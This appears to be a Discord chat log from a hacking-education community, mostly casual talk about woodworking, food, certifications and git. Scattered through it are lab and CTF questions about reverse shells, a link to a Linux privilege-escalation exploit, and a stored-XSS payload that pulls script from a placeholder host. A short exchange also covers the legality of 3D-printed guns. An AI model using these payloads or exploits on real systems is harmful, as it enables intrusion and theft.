#general

what's with the powertools though? something fun brewing?

not actually brewing XD

Nope, custom lab

Thing is, Even though the campus is open until 10pm, a lot of execs might have gone home or stay late to work without distractions, y'know?

Imma try to make a pirate treasurechest with an arched lid from palletwood.

that always fascinated me, how do you make an arch?

Gonna be a long process, as I'm intending to use this one to make templates and such, so I can shurn them out

it's called 'coopering'. partly maths, partly trial-and-error. Depends a lot on the width of the planks

so like a fine specimen to use as an example for further made chests?

That being said, I aint doing no maths. Imma eyeball it/offer it up to get the measurements.

Kinda, yeah

Once the basic boz is made, then I can go mad making them look sweet

sounds too hard for newbies like me

Haha, nah. most things in woodworking come down to a box.

A table is just a box with 1 side

It's the same as everything though. The deeper you get into it the more tricky it gets, but it's a surprisingly low bar to get started

Jigsaw, Drill, Ruler, pencil and sandpaper.

Don't even need expensive tools to begin

In fact, seeing Kevin typing - a bunch of my tools are from Gumtree (UK craiglist style thing)

haha i just dont want to be scammed

ok i trust gumtree now

The benefit of Gumtree or Facebook marketplace is if you pick the thing up, you can go look at it first

yeah i made a facebook account recently for marketplace

Haha, i never said that 😄 just enumerate. If someone is selling a £5000 laptop for £30.. Maybe second guess it 😄

dude secound guessing is how you miss good offers /j

sometimes you just get really lucky. A few months ago, I saw a table saw at a decent price. Turns out the guy was retiring and closing down his shopfitting business. Went over there, Ended up buying the saw, a nailgun and a big chip extractor.

(I almost typed shoplifting business.. That would have been funny)

i'm still far from setting up my own workshop(i.e buy tools) since my parents won't allow me to do such stuff. It's only possible after I move out

ppl allways have reasons to sell stuff, i want my first car to be a honda jazz or something cause ppl are allways selling it

for how much?

Another guy was selling wood-turning chisels SUPER cheap. New they'd be £30-£80, this guy was letting them go for £1-£3. Turns out it was a whole bunch of stuff from a buddy of his who passed away. Walked away with a whole box of stuff. Maybe 25 chisels, and a bunch more woodworking things

anyone here available for room help. i already dropped my question 🙂 feel free to pls dm me thank you

just wanna get that lucky in life

sometimes its worth buying new cause of the hastle making it less fun, so my first bike might be a cr450 or something reliable with warranty

well i'm lucky enough already, better not be greedy

idk about woodworking so i guess thats an ok deal ? lol

oh i misread

the table saw was £90 and was a dewalt flip saw (Table and Mitre saw in one). Nailgun was a Paslode final fix gas/battery powered and was £100. And the chip extractor was another hundred. all in was about £700-£800 worth of gear

not bad for £300

under 300? stealll

random i found a dewalt table saw in this old property my dad bought

been using a lidl table saw for about 2 years till I got that one 😄

i mean if it works

but i thought lidl was a grocery store

so unless its made of carrots

idk how that makes sense

Middle of Lidl, yo 😄

that isle is weird

they have welidng stuff

idk why

parkside (i.e Lidl tools) are ok for Right Now, or if you're only gonna use it occasionally. Medium/Heavy use stuff will break - but thats ok, cos then you know its worth investing in a decent brand

Welding is actually something I've never tried

im going to start next week

i was meant to yesterday

basically i made a deal with some albanian mechanics

Thats pretty sweet.

i know dude

im so excited and so is my friend

There's an approach to tools that I like. Buy the cheap one and if you wear it out, get the fancy one

haha, at the mention of metalwork... James appears 😄

thats what i do exept i buy the same one ...

Me? Metalwork? Never

Except Dremel - the parkside one is terrible. Go straigh for the branded one 😉

I keep seeing milling machines appear on liquidation auctions. Just don't have space for it. Or the money 😄

i want to make a delta mill

idk it wont work well

but it would be so cool

Well, I'm always for people building things

why cant there be delta mills

cause then i can do addative manufacturing and stuff super quickly on the same machine

I don't really know what one is, but shrug.

ninja james

i love having a diy mindset, if i had the time and the tools i'd have made everything myself except clothes cuz that's hard

Well, the trick is to make the stuff using the chepaer methods, even if it take more time. then you can decide if it's worth investing in

If you are still learning, then your time isn't really 'worth' much. (My mindset is around selling the final product)

my message wont send ill retry

makes sense, still it might lead somewhere and eventually lead to something that might be worth it

Yah, My friend is a ninja with a sewing machine. If In need any fabric stuff, she does it for me 😄

https://a.co/d/2qcnBEf

imagine that with a pointy spinny thing at tge bottom

Kevin - If it's a link or image, it won't send until you verify your account

Oh, links work 😄

1984

Ok, so like a CNC machine?

Hello, I’m new here.

fun stuff fr, i never really got into fabrics except fixing my socks which was a disaster

yes but mill and 3 arms

Sounds like Dr Octo 😄

i guess so

If you get one up and running, I'd be very interested. I'm sure ralexander would aswell

My next purchase will likely be a bigger wood lathe. My current one is great for spindles and pens, but not quite big/powerful enough for bowls

ralexander is all about the 3D printing and laser engraving

And spooky symbols 😄

and star trek stuff

I respect people who are able to diy their way in life. I do not have the patience for it.

I respct space. And frogs 😄

who said they were patient ?

lol fair enough

being stubborn works too

not being patient is part of why a lot of us do it, lol

"no this has to go right here"

why would i wait for and pay for a contractor when i can just do the thing myself

rage-venting by carving up wood and drilling holes

💯

an awesome way to vent

true, from my perspective I tend to value time more so than money. If i have the money, ill just pay someone else to do it and save that time doing something else. That's just me though.

and it's satisfying

you know you're in the shit with git when even the internet can't answer your question

exactly,

i can end up with something not only worse, but more expensive and time consuming in the long run too

diy is allways better

gemini/gpt

It's a balancing act. i like to think I know enough about a thing to know if I can do it, or to contract someone.

i can end up with something not only worse, but more expensive and time consuming in the long run too
honestly the same can be said about diy 😂
new tool that i'll never use again? i'll take 5

Ok, I can get a ball joint fixed on the van - It'll take a mechanic an hour, Max. Or a saturday morning for me.

My time is free.

trying gpt :/

fair point, i may be silly but i just like diy partly because i feel like i can do stuff and partly because I anticipate an apocalypse where internet goes down

lol also good point

whats the git problem

good luck

yeah you could spend it working your own job whilst the mechanic works on it or be happy with an excuse

one time i heard someone refer to gardening as diying a grovcery store.

grocery*

maybe maybe, or you just love plants

thats true, But why on earth would I want to be in work MORE often?

i do love plants

dis

debatable

trying to maintain git histories on individual files within a subtree without having to manually check it out into an empty branch and place the files so git tracks their location properly -- the normal subtree behavior retains the history in the repo as a whole but loses it on the file, since the path is now different ,-,

im a frog rinzler

idk i like working until i have to do something not easy

plants are my jam, i love to sit on them

If it's a time-value thing - imagine you could do Everything. Then you could work a lot less and have more time to do the stuff you want, when you want

but you can do everything

exept what you cant do

...

Zaclty.

i think like this a lot

then i work towards something

In order to learn everything, you need to try stuff and get better at it

but no plants in space

then theres a little challenge and i question every decision until then

Literally everything is in space 😄

its a sacrifice i think about every time i wake up in the morning.

even nothing is in space

learning a new skill isn't a sacrifice. It's devlopment

i can't seem to form an argument but i want to

thats next level stuff. never worked with git subtree

ez, rewrite git, make a contribution

admit defeat and next time refer to outer space

normally i defer to submodules, but github doesn't include submodules in zip downloads or release downloads, which is the main delivery mechanism here, so i have to merge the would-be-submodules into the repo normally ,-,

i blame github more than git

i'll go with that

okay..........i just tried a new merge strategy and it dumped the repo-to-be-merged into a random directory like 3 levels deep by itself

tf

how's that possible without specifying a path

or did it create subdirs?

like the path exists
but i don't remember having used it for anything in the last few hours, let alone anything related to the merge 😶

look at the rules maybe?

should i look for the best deals and post then here so you guys can help me confirm its legit, i don't make a lot of money so im not taking any more risks. i think after getting this i will save up for an air compressor and build a cnc machine to put in the garage so as soon as i can weld i can make custom bike parts and stuff then i wont have to work doing things i dont like until im 18.

any issues with this plan ?

no issue partially because i know nothing about bikes

wait what

air compressor, forged, carbon fiber - are all words that feel weird together

believe in yourself!

oh that was edited out lol

same but were not the same cause i watch occasional videos and tell myself i dk

yh cause icba to explain it to everyone but i might aswell

by "bike" do you mean bicycle or motorcycle

making custom bike parts seems cool though. if thats what you wanna do, go for it

basically left over carbon fibre tow or prepreg can be put into a mould and then cooked; its common in the automotive world among enthusiasts for example, in fact lamborghini is trying to make connecting rods out of them

bicycles at first but when im older i want to work on motorcyles too, i want a custom dual sport or supermoto eventually to proove my abilities.

but i dont have them yet lol

or money

oohhhh i just noticed your profile picture Kevin. Mr. Mccandless made me really wanna go vanabonding when i was younger.

highly recommend. just a forewarning though if you plan on making custom parts for them --- if you make parts for other people that are structural -- like parts of the frame -- and something goes wrong, you would be on the hook
just keep liability in mind

but i do highly recommend getting yourself a bike in any case

anyone worked with terraform here with big clusters?

yes. and to answer your next question, no, i don't remember shit.

i wouldnt want that to happen; legally i get it but morally its wrong too

does it get supercomplex is the next q 🙂

i dont want to edd up is the next saw for ruining someones brakes

haha its not noticed much yk

honestly, even if i remembered anything, it'd be hard to say 😂 complex to someone down in EUC might not be complex to somebody in infra eng+auto

in our environment it was fine

the thing is, terraform is meant to simplify your complicated deployments -- if you're using it right, it will be making things easier -- but that's coming from what could already be very complex envs

could suck could not

@bleak dagger my definitely not biased whatsoever self recommends an MT07

i mean naked bikes are super cool but too scary for me, its a naked bike like the mt09 i see on ads right ?

dont doubt it. there was a novel written that was inspired by him. Into the wild. Was made into a movie and still is one of my favorite sound tracks. Who doesn't love eddie vedder lol

@molten sky , you have any experience with Kubernetes hardening?

mt07 and mt09 are both of the same family, actually (hence the similar name).
the mt07 is a parallel twin ~680cc and the mt09 is a 890cc triple

the sound track sounds very track

the 07 is quite a bit tamer but still torquey

haven't touched k8s a single time in the last like two years but we used it before that

ooooooo, did u do any hardening within the time u used it

you know maybe as my secound bike, when i have more money and experience. id like to think im smart enough to know id get overconfident lol.

hardening is a broad term

i did but i can barely even remember how i managed it other than "oh yeah kubectl or something existed i think"
i'd need to brush up

why does your profile say fosscad, is that stuff even legal ?

I've setup a few on premise vmware clusters and on aws and gcloud

dont advertise this bro 💀

if you like the style, they have the mt03 as well which is a lot cheaper and only a 300 class

nut what you mean with hardening? setting capabilities on pods?

(if you wanted the naked style ofc)

federally 100% legal in the US

icl youre right

some states have laws about them but federally 100% kosher

lucky

i want plastikov

(some rules, like you can't build to sell like a licensed manufacturer would, you have to have so many ounces of metal for metal detectors (defacto the firing pin, barrel, anyways), can't build certain Title 2 firearms without a stamp, but that's about it)

not really im not responsible enough but

its cool you can make anything innit

can't make enough tho, at least not legally

the fun stuff is still regulated

plastikov isnt fun ?

ik there're a few other counties who allow homebuilt, but i have no clue which ones

plastikov aint auto

why

auto would be fun

but they shut that down back in 86

semi auto is literally more complex than auto

they dont have to know

jkjk

fun to work on? can be. fun to use? i'd wager auto would be more fun

damn expensive tho

at 30c a pop that adds up quick

true but you can use it to make money

if you mean by selling, then unfortunately not in the US

ok ill stop there

well, not within the bounds of what's legal

gotta get that permission slip

oh yeah thats totally what i had in mind 😅

not anything else...

oops ctrl v

can't seem to find any decent reference for international laws about it, but a bit curious now

Hi, I want to ask if there is any place to find offline applications on windows. Because almost every app want you to login and create an account and be online almost all the time. even a simple to do list app want you to make an account.

obv very limited

are you using the microsoft store? it sounds like you're using the microsoft store

dude i dont think dealing 3d printed arms is worth it

nope I don't use it. its bad enough

unless you have lots of people

unless that's a typo then yeah it wouldn't be -- it'd be simple to get licensed to do so, but even then, it's just not worth the trouble

building for yourself is fine (in the US) but dealing in them is a whole different issue

huh. not sure how you had that bad luck then, lol
for notes, things like Obsidian (paged notes) and Logseq (journaled notes) are extremely common, both being account-less (i just use that for todo stuff as well)

nix here, not windows, but i think they have windows apps too

@molten sky @bleak dagger Let's stop discussing 3D printed weapons.

k

😢

I will check them. thx

Gave +1 Rep to @molten sky (current: #87 - 72)

huh. haven't seen you in a while actually. this your daytime?

It's 9:22 in the morning and I'm making a coffee and bacon sandwich

Well, those are independent items

you're not that far off then actually. odd. but yeah that sounds tasty rn

Bacon sandwich will be with ketchup on a toasted roll. Coffee is with milk and no sugar.

should've made a bacon sandwhich instead of having leftovers

i just use pan bread/sandwhich bread for it instead of a roll but otherwise the same

i tend to prefer a ton of bacon rather than thick bread

throw the slab on

You've got to toast it though, on the inside

always toasted

(both sides tho, cause well, it's a toaster, and pan/sandwhich bread --- if it was a roll then just the one)

Bacon is ruined by ketchup. Coffee is perfect by itself.

I agree on the coffee. But the bacon+ketchup combo is a killer

not normally, just when a sandwhich

lol you have a thing for that? like you didn't type preference, you actually had a button for it

silly, but I like it

It's from a mechanical keyboards server, because that hobby often has people bashing others over a matter of personal preference

that tracks

oh for sure, its all down to preference, I was just stating mine

You have to have the ketchup though. It's a sour and sweet contrast to the salt on the bacon

I do love bacon with Chalula hot sauce

I was tempted actually

I've got a bottle on the go, good stuff

chalula i normally reserve for chili

sriracha i use more often

i actually need to buy some more now that i think about it

I wouldn't do sriracha with bacon, not a contrast

I travel a lot for work, mostly to the same hotel. They have little packets of cholula and so I always have it on me. I call it pocket cholula

same i'd opt for ketchup in the case of bacon

i use ketchup for literally two things, and that's it

fries and bacon sandwiches

https://tenor.com/view/pocket-sand-dale-king-of-the-hill-gif-15251105

pocket chalula

you get me!

Ah the age old debate

Brown sauce or Ketchup with bacon.

tf is brown sauce

bbq?

steak?

no we don't put a1 on bacon

that's nasty

It's made by HP but it's not the same stuff

A1 steak sauce is in a class of its own, but im not putting that shit on bacon

HP Sauce is a British brown sauce [ . . . ]

explains why i didn't know wtf it was

we've got HP but not that

A1 is apparently a class of brown sauce

But I've not tried A1

You uncultured swine! /s

a1 is fine

Sauce on steak is sacrilege after all

Bottled sauce

i find most steak sauce to just be a cover up for a bad steak

Peppercorn, pan sauces, all acceptable

some good steak butter

dump some rock salt on (when cooking, not after)

Eh, I'm not too amazed at the Arc browser.

Unpopular opinion: butter on a well marbled steak is just a hat on a hat.

While both HP and A.1. may seem like copycat recipes of each other, the only similarity they share is that they are both tinted brown.

i think it's the cut that decides it here

in either case, the butter adds quite a bit of juice for you to soak up in your potatoes or veg or whatever else

soak up that steaky goodness into your garlic mash

I like the way you think

speaking of cut

ribeye is the only acceptable cut to get warmer than mid rare

a lil bit of extra time to help melt down that fat and it's perfect

A thick ribeye deserves a reverse sear

but its my favorite cut to cook

Rare or medium rare

That's all

agreed

agreed for everything except ribeye

ribeye has a ton more fat that you need to melt down

medium

We have different names for cuts here

Like our sirloin is your NY Strip or something

those are distinct cuts here as well

Judge me

cheese isn't melted yet am judging

@naive violet (context)

sirloin is much leaner

Maybe im dumb but those look like the same cut to me; marbling with a fat cap

similar, but different

the main difference is the amount of fat but the strip also tends to be a lot more tender

@molten sky https://steaksociety.com/steak-cuts/

We use sirloin to describe a different cut

well hold on

where is we

The united kingdom

huh. thought the UK shared the name. was gonna say I knew Aus was different

ngl i don't know the last time i heard anyone say ny strip irl

always just strip steak

we have like all of those, weird that the US is excluded from em

We use so many different words, I find myself translating sometimes

except rump maybe

honestly flank is my favorite cut of meat that isn't a marketing term

perfect for a long marinade and its cheap as hecl

you can use skirt steak to make some damn good tacos

same thing! flank == skirt

used as distinct cuts here, but both real good

Marinated flank

haven't marinated a slab of flank since the summer --- was tasty

I love to cook 😄

but yeah around here at least, flank refers to the meat around the abs while the skirt is lower

skirt is more meaty taste wise but also not as tender

so if you're shredding it for fajitas or tacos or something for example, skirt would be ideal

oh dang I thought they were the same

they look quite similar tbh

and it's not as distinct of a difference as say, ribeye to a filet would be, but a difference is there

idk if i've ever purchased skirt without the intent to shred it for something

definitely 100% anatomically accurate beef factory (see abdominal area for skirt and flank)

Hi! Does anyone knows which rooms or labs has Heath adams (thecybermentor) created on tryhackme

Is this for an internship? 👀

Yea lol

Then we can't help you.

MadScottishburd asked the exact same thing yesterday 😄

I found one but I'm confused

For the exact same reason.

Oh lol

This is to test your research skills, not ours.

Whats it about? Is it a task in one of heaths certs?

Guess we are doing the same intenship then

Or using the same materials.

She managed to work it out 😄

Nah.. we just needed to perform an OSINT to find a room created by someone

hmmmm

Came to the conclusion it was heath

And found one. Cuz i did the Advent of cyber few months back

haha some of the things that guy does.

Hes a liability unto himself 😄

But i was wondering if he made more

I know the answer, I can't tell you though.

Apt upgrade fix missing takes forever

Sure no worries

I think so. He's been around since the start of THM (i think)

Yea he might have

Would be so much easier if i could find his account on thm lol

Looks like you're gonna be checking each room individually 😄

What's better, apt, pacman or snap?

Yup I'll do that

Or is it just user preference?

Preference mostly.

Aein - theres only 798 rooms, shouldnt take too long :p

Is it okay to install two different ones?

couldnt possibly be a better way to search or filter

Nah, there is more.

manually is probably right.

Yup 😭

😄

Damn

Hydra to crack the password (or room in this case) 😎

782 rooms now.

Feeling like gojo after he said "nah I'd win"

The bot is rate limited.

Can I ask the course thing you're doing?

Is it a particular room or something?

Btw his room is free right? Cuz i don't have the premium rn

Hang on I'll check

Think about it, Shadowy. What sort of course would ask people to find info?

Sure

Yes.

They're free.

I know OSINT but is it part of THM? Or something else?

Nice

No it's not part of thm

External internship.

Yes this

Oh yeah

Sounds fun either way

I knew as soon as you asked. 😛

Yup.. I'll go hunting now bye

Well, Kinda.

not too many sites are just HTML nowadays

I mean, there is literally websites and tools that do it for you, why bother copying the code?

Isn't that how most phishing links would work theoretically?

Is it not dangerous to show photos of the Mona Lisa, when people could copy the colours and make a painting that looks identical?

It's one way.

I'm sure there's plenty I won't ask about

There is a lot to unpack with that question @rapid merlin

If only there was someone with multiple arms/hand to help unpack it 😄

The quickest answer is PKI and trusted certificates

I nearly got done over by a dud certificate. Looked fairly legit though.

Dud is definitely not the correct word but along those lines.

I think i found it lol

🥳

See? You didn't need us 😄

Remeber Aein - you are a castle. you can stand against anything 😄

Hehe

How long is your internship?

Well all i needed was motivation from u guys

3 months

Someone been playing AoE 🤣

Unpaid?

Do you a job or anything out of it?

Hi

Unpaid

Or the potential job application?

Oh 😦

Just doing it to gain real world experience

It's Remote so

Gday

Yeah, I knew it was remote.

It's manageable

How's it going?

I know some details from another community member who is doing it.

For the HTML part. modern websites dont really rely on HTML anymore. its all DOM and JS or variations of JS. That being said, even if you could perfectly mimic the look and feel of a legitimate website, PKI and trust chains prevent typically ensure that you can trust the website you are browsing because the Certificate Authority has done their due diligence to ensure the validity of the website. PKI isn't perfect and things like certificate pinning have shown over the years why it isnt perfect, but its pretty good

Scrubz can I ask how long u been in IT/Cyber?

4 years.

Acedemic, however.

Is that when u first completely started?

Well where I'm from.. they make u do unpaid internship for 6 months even that is WFO.

Nah, I used to be.. um...

Not white hat in 90. early 00's.

but thats all been..... scrubbed... away 😎

Web application security is a deep and nuanced topic, but you can be fairly certain that if a website is using TLS and has a valid certificate they are who they say they are.

🤣🤣 nice

It definetly has!

Now I'm a member of a good community, where I enjoy helping people learn. 😎

Not white hat as in opposite? Lol

Maybe don't pull on that thread 😄

I'm not going to say anymore 😄

Bruh

If someone claims a hat, you know they are old 🙂

No judgments here, awesome what ur doing

I also get the benefit of being a volunteer for THM.

U build computers n stuff quite young?

Yeah.

I've loved computers but could never wrap my head around the hardware fully.

I understand it better but yeah still a learning curve.

@glass nest hey do u think i can get the ejpt if i go through all the materials they provide?

in a heartbeat. That being said, might be worth investing in a slight higher-level cert that costs the same

You can get a PC build simulator on Steam 😎

It's just like the real thing.

87% idk if it's my Internet being slow or my old laptop lol

How realistic is it?

Hmm yea I'll be doing those too.. planing to collect all the certs like infinity stones

Do parts blow up if u do it wrong 🤣

dont

maintaining a bunch of certs is expensive

I mean I know what the parts do but fitting them in. I was never good at jigsaws.

Oh..

I've figured just stick to the certs you need.

Too many certs can damage your job applications.

I assume as you progress, stuff like Sec+ doesn't exactly matter.

So i need to earn only those which which will help me on my journey

Or the ones your employer needs you to have, and will pay for.

Bingo

Do we just pay for the starting ones and most employers pay for the rest?

Well in my country u need to have atleast 2 to get a job

Pizzaology with a minor in sauce dymanics.

Which country?

I maintain CASP and CISSP to cover IAT and IAM III

India

So Ceh and something else.

otherwise its a ton of money to maintain anything more

1st is CEH

Yes

Sorry to hear that,

CEH....

yikes.

What would kiwis go for first lol

Sec+ and A+?

Eightgloves - HR Filter in india.

I'll be giving ceh next month due to this

A+ is very basics. almost too basic

Ceh is MCQ?

Yes

I thought the new version had a practical element?

Nope mcq

V12 is mcq as of now

The best thing about CEH is the title 😄

If you mentioned CEH in the US you would be laughed out of the room

i think PNPT was originally PEH for the badass title

I bought the voucher when i was in college a few months ago and didn't know anything cyber.. cuz my professor told us that it was the best thing to get into cybersec

And i was like nice

in India, Yeah. It opens the doors. Other places in the world, not so much

Yup

I think it'll Change in a few years tho

But thats the thing, get the certs that are marketable in your locality

Even if they are CEH 😄

What's the best in NZ?

Yea

I have a few certs I personally hold in high regard, but at the end of the day its about getting into the workforce

those pineapple candies?

That's y i was asking about ejpt

I'm not sure tbh.

Cuz some recruiters tells us to clear it in a month to show them that we are worthy

Well, I did eJPT for fun. you get 3 days, but I did it in a few hours. Like.. I went over the whole thinga again to make sure.

I've just been thinking the main 3 Comptia ones

It surprised me that I'd answered all the questions

Net, Sec and A

Cuz u the goat

Can't go wrong with those, surely.

Nah, I don't think you can.

Anyone here skilled in upload rev. shell can DM me? dont want to spam here. Thanks! :))

look through the Syllabus for A+. for real, People have said 'If you can turn on a computer, you can get A+'. getting any other CompTIA cert probably over-rules it.

The package manager upgrading been waiting in me to type Y for the last 30 minutes 😎 me thinking it was just taking forever.

Why do you need to DM?

Surely this could help other people? 🙂

Didnt want to interrupt chat here 😄

but sure, let me ask here

-y won't need interaction.

good morning

eh, we are just chatting random here 😄

Hello Hello.

Yeah it wasn't working with that properly for some reason.

Isn't their also websites for that lol

There

@glass nest what do u do for work

Yeah, but they might be doing something wrong.

I make and deliver edible circles of joy for people in the southwest UK

me or esqy?

Nice

Very true. I forgot the website name I use in particular but there's an option for a lot of different rev shells. Not GTFObins. It's like a generator though.

ben - Lets be honest, whatever you do... Making pizzas is bae 😄

Great for THM CTFs

Ah sorry man i replied to you

That one?

revshells.com?

Theres even an Emoji revshell on there 😄

think it's called Ivan something?

true true. making circular dishes of various sauces, cheese and meat is gooooood

If you upload rev. shell on a website, and you are receiving error like The image cannot be displayed because it conaints error - netcat is not showing any attempts for rev. shell. Is there any solutions or anything like that? I have tried revshell.com generator with encoding and everything, still no luck. Worst part is that its not even trying to attempt connection so I have no clue what to do next. I did complete whole upload room on thm so Its not an issue to upload, but to create connection on rev. shell. Checked IP and PORT as well, its correct for sure.

Part of a.... well rounded... diet 😄

Fun fact.. i ate my first pizza when i was 22

Which website are you doing? 🙂

Well 2 years ago lol

@lone thistle Have you seen the DIRTY cookies we have now? It's basically a whole creme egg baked inside a cookie 😄

I have heard of 'em aye

My son won't stop banging on about them.

Apprently the whole country practically sold out in a week

He wants a dominoes every night because of it.

Haha. See this is why plymouth is better. I know some people and could hook you up

sue me but I'm not a sweet tooth person 😅 I don'tt get the hype

Yeah, but your hours away

Well see you guys around. Have a nice day

Its a private lab in VM, there is no walkhtrough on a website and im trying to understand this upload vuln.

As someome who doesn't like creme eggs anyway it was a solid pass

Then it may be with how the image is being uploaded and not necessarily the payload itself (although that could be it). Hard to tell without knowing the web app stack, the web app itself etc, if it's even possible

Google file upload bypass

It's like i don't even know any of you any more. SMH

Guys I have a box with Ubuntu 22.04 and this exploit:

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629

is working well so I can privesc. But I was also using LinPEAS before and "Linux exploit suggester" did not tell me.... Any ideas why?

To be fair, I have a bit of a sweet tooth, and I can only stomach 1 of them

I don't even buy much junk anymore tbh, too focused on trying to eat my diet which we will discuss no further

Good for you, taking control 🙂

May as well, your body is the only home you'll ever live in forever

Untill I get uploaded to a San junipero style VR

Might be, thank you. Its CTF therefore there is some vuln. and I focused on upload but it looks like there is no go for me there, either its not possible or im doing something wrong even that idk what 😄

Gave +1 Rep to @lone thistle (current: #8 - 810)

Haha, I can't wait till there are some more big steps with VR

Ready Player One coming soon...

Yah. looking forward to haptics and stuff becoming a thing

There also comes downsides with that

I think the more advanced our VR gets the further people become anti-social

I'd argue the opposite might be possible also

i guess so, but on the other hand other opportunities will open up

Yeah it's an interesting thing to think about

I just hope that we don't get more out of touch with people

Discord for example, helped me to learn how to socialize with people than just "being out there"

hi

Do you interact better in real life as a result?

is this a coding server

Nope

Some coding, but not lots

There's a gain yeah, I can practice in vc, stand up, pretend they're in front of me, then apply that IRL

I think honestly online platforms don't help me as people will often mask. They don't act their true selves online at all imo

That's pretty cool, I'm glad it builds your confidence

I try to.

Yep it's a useful tool

Opposite for me, my beliefs/values are unorthodox where I live so I have to mask

Yeah, I have spent a lot of time in questionable communities where people don't xD it's nice to be in something more laid back

Interesting

It's an acceptance thing, I have friends online who would accept my values fully, which is hard to find IRL

Its the difference between a learning enviroment and a fan envorment

+100

And no I don't mean criminal anarchy values, values that are normal to you, which are not normal where I live

Yah, all equal on here

Training the next gen of cyber defenders and warriors is pretty shweeet though 😄 😉

Are you from the west?

Yeah there's lots of egos in skid communities

everywhere has a west 😛

Oh yikes

If you don't, you're an outlier, at-least the people around me see it as that

Unfortunate but at least you can find like minded people online ^_^

Yep, I'm thankful for that

half of europe is like that too

I'm somewhat aware yeah

But yeah, none of that is here, and can't really comment on local cultures etc.

personally? I don't care where your from, what you believe, who your attracted to or what you identify as. Alls I care about is people being excellent to each other.

https://tenor.com/view/party-on-folks-be-excellent-gif-25511039

My beliefs lie in the traditional Stoic camp, so same

https://samples.vx-underground.org/tmp/Lockbit_Statement_2024-02-24.txt

who is lockbit?

Can you get reverse shell from stored xss if script alert is working? Thanks!

@glossy portal This isn't appropriate for here

Do you know how XSS works?

Yes, I guess i asked in a wrong way 😄 Let me rephrase it. I have tested in working xss following script but its not giving me reverse shell, ip and port is correct.
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>

Any other ideas how to make xss reverse shell working. Thanks :))

XSS can't lead to a reverse shell.

It's not code execution on the underlying system.

I see, thanks for explanation 🙂

You'd have to chain it or hope that JS is run server side

I want to be a hacker, how to start?

Have a read over #start-here

It’s the largest cyber gang least it was.

@sick lance When did you signup to the arc waitlist (if you can remember)?

Thursday

Student email?

Yeah, students get 24 hours.

Ah, thought so - Okay cool

Hi guys
I'm new here

Wow that’s really interesting

Hello

How's your day going

Good

Wby

Awesome

I just have the ambition of being a hacker
But I don't know where to start

Hell yeah

#start-here

Thanks 😊

Gave +1 Rep to @wintry sluice (current: #2006 - 1)

I want an Ironman one of these

I think I seen the endgame funko pop of iron man

There was also like dr strange and stuff

Nice

Casually bumped into a dude repping THM Merch

|| @mossy river 😉 ||

👀

Gotta respect the drip

Can I install Kali Linux on WSL2?

hackerman

Well, I want to start out with ethical hacking!

lol

https://tenor.com/view/munsonated-gif-26549638

Can someone advise me?

Now we know an osint point for Jabba

Good luck finding me among all the other students at Warwick

now even more info

Too late

hey is it safe to use kaspersky cus i heard the russian government has backdoor in it but im not sure if true

not quite sure about this propaganda but i use malwarebytes and i think it's the best AV out there

If you don't feel comfortable with the possible government ties, use something else.

im just asking if its true

im just asking if theres evidence

i couldnt care less if vladamir putin has my search history, i dont criticise him lol

was just curious

From that response, I'd say you do feel uncomfortable. That means use something else.

im not uncomfortable]

lol

https://en.wikipedia.org/wiki/Kaspersky_bans_and_allegations_of_Russian_government_ties
Just look at the citations for evidence

Whether the evidence can be trusted is a different question.

Oh u a Warwick student?? I got personal beef with Warwick from a university ctf I did last year 😂

Which CTF

Sheffield Hallam university

Did Warwick beat you or something

Yeah man 😂 Warwick had 2 teams, both sat right next to eachother and of course they’re top 2

We came 3rd, but Warwick was a conjoined force of 10+ whereas we were a team of 4 lmao

Do you remember the team names?

Also L

Common Jared W

I’m sure they weren’t particularly exciting, like Warwick 1 & Warwick 2 😂

Hey with 3rd place we did get some HTB vouchers and a bronze spray painted Amazon essential keyboard

Hmm, I don’t remember any CTFs last year but I also don’t really remember last year

That's a great prize lol

Out too busy at Spoons

Speaking of, Jabba, lmk if you're down my way

Of course

THM Official meet-up when

Let’s all just meet inside a web shell

Address is 127.0.0.1 right? 😂

Since we often use Anonymous as an entry point for more information, doesn't it make sense to block/delete the user as far as defense is concerned? 😮

Huh?

I agree with Jabba.

Let me clarify it 🙂 XD

Often we use the when we check ftp/smb the anonymous user where we can find some informations. doesnt it make sense to block it via configs in case we are system administrators? 😮

Of course. Unless theres a reason to keep it 'public'.

Thank you very much for the answer! ❤️

You should always remove anon login lol

I was wondering cuz this is a entry point in some cases

the reason we check is in case a sysadmin left it on by accident

Do you know how many have anon login on smb in the world rn with financial data open to the public?

A lot

Lots of 'hacking' is just finding stuff that a sysadmin got wrong, forgot, didn't know about etc

thank you guys, love this community.. i was wondering and now im a bit smarter XD

Okay so cpts or pnpt

Can’t decide which to go do

Tough call. PNPT is fun, but not widely known yet

Cpts is?

I hear Cpts equates to like a 110 page pen report

Hehe

Well, Honestly I like TCM. The couple of times I've spoken with him, seems like a really good Egg. I don't know too much about the HTB crew other than Emma

Hmmmm

The HTB academy was a bit... hmm.. when it was released, with that 'Cube' system. I think it worked out that you'd be spending a few hundred bucks on content you can get for free eslwhere. I have been out of the game for a while, so that might have changed

I’ll probs go cpts into pnpt tbh. I just hate reading. The videos in ejpt were better

Yeah. Apart from how the guy says 'Meterpreter'

Or the other guy

'Meter Preter'

Who was “neat”

And the. You get. A shell that’s neat!

Funnily enough he says it the other way later in the videos...

lololol

I just hate how e learn certs expire now 😭

The ejpt content was good - Is it all still free?

Hah no

They confungled that so much

It’s stuck behind a 300 dollar purchase

Ah, so you buy the cert, then get the content for it. I suppose that how a lot of other places do it

Or you do the monthly sub and buy the voucher for like 250

Are you planning to do both?

HTB Academy is really really good. If you've got an edu email it's also very cheap

Lots of content for a great price

I say it meh-terpreter

Mater Pater

Meter Reader

Aye, i think it was just the pricing structure that put me off. I'm not in education, so I don't get any of them tasty discounts

Yeah fair enough. I think the subscription without the discount is still worth it, but defo more expensive

my friend just got his data resetted by an hacker the hacker got his email and resetting his phone by app called find my device, and I wanna ask how do we prevent someone that have access to our email to reset our phone, cause this is kinda scary

Keep good passwords on your email

And dont click on suspicious links

use a strong password, check ssl cert before inputting it for email

so there is no like setting to not letting our phone got resetted by someone on our email ?

Maybe, but that would be to do with iphones settings

wdym reset

as in his phone got hard reseted?

I think theres an apple feature that allows you do to that remotley, not sure

Aces - Its a thing you can do. There are services that can brick your phone remotely if it gets nicked

ooh

Personally wouldn't enable it, but that's my own threat model

thats kinda dumb tbh

Nah, it can be very useful if you have sensitive data on there that you need to get rid of if it falls into the wrong hands

Oh it can be used to back your stuff up aswell 😄

